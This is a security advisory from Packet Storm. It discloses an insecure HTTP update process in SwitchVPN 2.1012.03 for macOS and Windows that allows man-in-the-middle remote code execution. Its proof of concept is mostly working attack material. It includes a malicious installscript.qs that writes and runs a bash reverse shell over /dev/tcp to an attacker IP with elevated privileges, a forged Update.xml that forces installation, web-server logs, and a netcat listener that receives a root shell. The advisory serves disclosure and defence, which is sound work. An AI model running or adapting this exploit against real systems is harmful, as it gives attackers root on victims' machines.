exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SwitchVPN For MacOS / Windows 2.1012.03 Man-In-The-Middle

SwitchVPN For MacOS / Windows 2.1012.03 Man-In-The-Middle
Posted Nov 14, 2018
Authored by Bernd Leitner

SwitchVPN for MacOS and Windows version 2.1012.03 suffers from a man-in-the-middle vulnerability.

tags | exploit
systems | windows
SHA-256 | bb38df2916279a67eae167360690706c54013599fd3e8810b088263a9fa9d6b4

SwitchVPN For MacOS / Windows 2.1012.03 Man-In-The-Middle

Change Mirror Download
=======================================================================
Title: Insecure Update Process and RCE
Product: SwitchVPN for MacOS, Windows
Vulnerable version: 2.1012.03
CVE ID: Requested
Impact: Critical
Homepage: https://switchvpn.net/
Identified: 2018-11-01
By: Bernd Leitner (bernd.leitner [at] gmail dot com)
=======================================================================

Vendor description:
-------------------
"By 2015 we were frustrated that the free internet we loved was under
threat.
As experts in online security we believed we could solve this problem. So we
came together as a team to make SwitchVPN, a simple and powerful app to keep
the internet free. SwitchVPN is simple. Install it on your phone, tablet or
laptop, then just switch it on to keep the internet free. SwitchVPN is
powerful.
Our exclusive VPN Service technology is constantly being upgraded by a
dedicated
team of internet security experts."

Source: https://switchvpn.net/


Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker
can leverage the update process to install malware or execute arbitrary code
and fully compromise the system.

Users are urged to disable auto-updates and do not run the manual update
utility
until the issue has been fixed.


Vulnerability overview/description:
-----------------------------------
Insecure Update Process

The update process in the SwitchVPN client is vulnerable to a MiTM
(man-in-the-middle) attack. The client either checks for the availability
of
a new version using the integrated auto-update function, or the user can
manually initiate an update using an update utility. Version information is
pulled from a remote XML file and compared to the version number of the
currently installed SwitchVPN client.

All requests are transmitted over HTTP, which means that an attacker on the
same network is able to intercept and manipulate the traffic.

This means, an attacker can trigger the SwitchVPN client to download a
malicious update package which will be installed on the device. In addition
to that, an attacker is able to implant an installation script
(installscript.qs)
which will get executed immediately with elevated privileges. When
auto-update
is enabled (which is the default setting), this process happens completely
transparent to the user.


Proof of concept
-----------------

In order to demonstrate the issue, a PoC for spawning a remote shell on
MacOS is
presented. A demonstration video can be (temporarily) downloaded from:
https://www.dropbox.com/s/zwczouzh922z2un/poc_switchvpn_update.mov

NOTE: Delivering a malicious payload through the main update package can be
set up
the same way:

1) Prepare malicious installscript.qs:
============================================================================================
...
Component.prototype.createOperations = function()
{
component.createOperations();

installer.execute("touch", "/tmp/pwn.sh");
installer.execute("/bin/sh", new Array("-c", 'echo "bash -i >& /dev/tcp/
192.168.1.2/9999 0>&1" >> /tmp/pwn.sh'));
installer.execute("/bin/sh", new Array("-c", "chmod 755 /tmp/pwn.sh"));
component.addElevatedOperation("Execute", "/tmp/pwn.sh");

installer.installationFinished.connect(this,
Component.prototype.installationFinishedPageIsShown);
}
Component.prototype.installationFinishedPageIsShown = function()
{
console.log("Component.prototype.installationFinishedPageIsShown\n\n");
}
...
============================================================================================

2) Store "installscript.qs" in folder "com.svpn.osx" and compress to
"2.6666.03meta.7z":
============================================================================================
mb:~ b$ shasum 2.6666.03meta.7z
20ebcbe4ff4f9876b3f49bf6db74a1b89d19100f 2.6666.03meta.7z
============================================================================================

3) Prepare "Update.xml" which will be delivered to SwitchVPN client:
============================================================================================
<Updates>
<ApplicationName>{AnyApplication}</ApplicationName>
<ApplicationVersion>1.0.0</ApplicationVersion>
<Checksum>true</Checksum>
<PackageUpdate>
<Name>com.svpn.osx</Name>
<DisplayName>Switch VPN</DisplayName>
<Description>Switch VPN</Description>
<Script>installscript.qs</Script>
<Version>2.6666.03</Version> // <----- New (high) version number to trigger
update
<ReleaseDate>2017-10-12</ReleaseDate>
<Default>true</Default>
<ForcedInstallation>true</ForcedInstallation>
<RequiresAdminRights>true</RequiresAdminRights>
<UpdateFile CompressedSize="12805545" OS="Any" UncompressedSize="33330707"/>
<DownloadableArchives>SwitchVPN.app.7z</DownloadableArchives>
<SHA1>20ebcbe4ff4f9876b3f49bf6db74a1b89d19100f</SHA1> // <----- SHA-1 hash
of 2.6666.03meta.7z
</PackageUpdate>
</Updates>
============================================================================================

4) Perform MiTM attack (e.g. using arpspoof, bettercap, etc...)
============================================================================================
NOTE: Setting up a MiTM environment won't be discussed in this advisory.

Create the following folder structure for the malicious web-server:
/updates/osx/repo/com.svpn.osx

Store Update.xml to:
/updates/osx/repo/Update.xml

Store malicious update data to:
/updates/osx/repo/com.svpn.osx/
-rw-r--r--@ 1 b staff 12805505 Nov 1 14:37 2.6666.03SwitchVPN.app.7z
-rw-r--r--@ 1 b staff 40 Nov 1 14:37 2.6666.03SwitchVPN.app.7z.sha1
-rw-r--r--@ 1 b staff 526 Nov 1 20:36 2.6666.03meta.7z <-----
contains malicious "installscript.qs"
============================================================================================

5) Start SwitchVPN client or run the manual update utility:
============================================================================================
# Requests are successfully redirected to our web-server

Serving HTTP on 0.0.0.0 port 80 ...
127.0.0.1 - - [01/Nov/2018 22:26:59] "GET
/updates/osx/repo/Updates.xml?1775745742 HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:26:59] "GET
/updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET
/updates/osx/repo/Updates.xml?457235306 HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET
/updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET
/updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z.sha1 HTTP/1.1" 200
-
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET
/updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z HTTP/1.1" 200 -
...
============================================================================================

6) Receive reverse shell:
============================================================================================
# Start netcat listener before starting SwitchVPN client

mb:~ b$ nc -l 9999

bash: no job control in this shell
bash-3.2# whoami
root
============================================================================================

Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable: 2.1012.03.
Earlier versions might be vulnerable as well. Both, the Windows and MacOS
versions are vulnerable.


Vendor contact timeline:
------------------------
2018-11-01: Contacted vendor through management@switchvpn.net
2018-11-02: Sent advisory and link to PoC video to management@switchvpn.net
2018-11-11: Requested update from vendor
2018-11-12: Informed vendor about advisory release

Solution:
---------
None.


Workaround:
-----------
None.


EOF B. Leitner / @2018


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close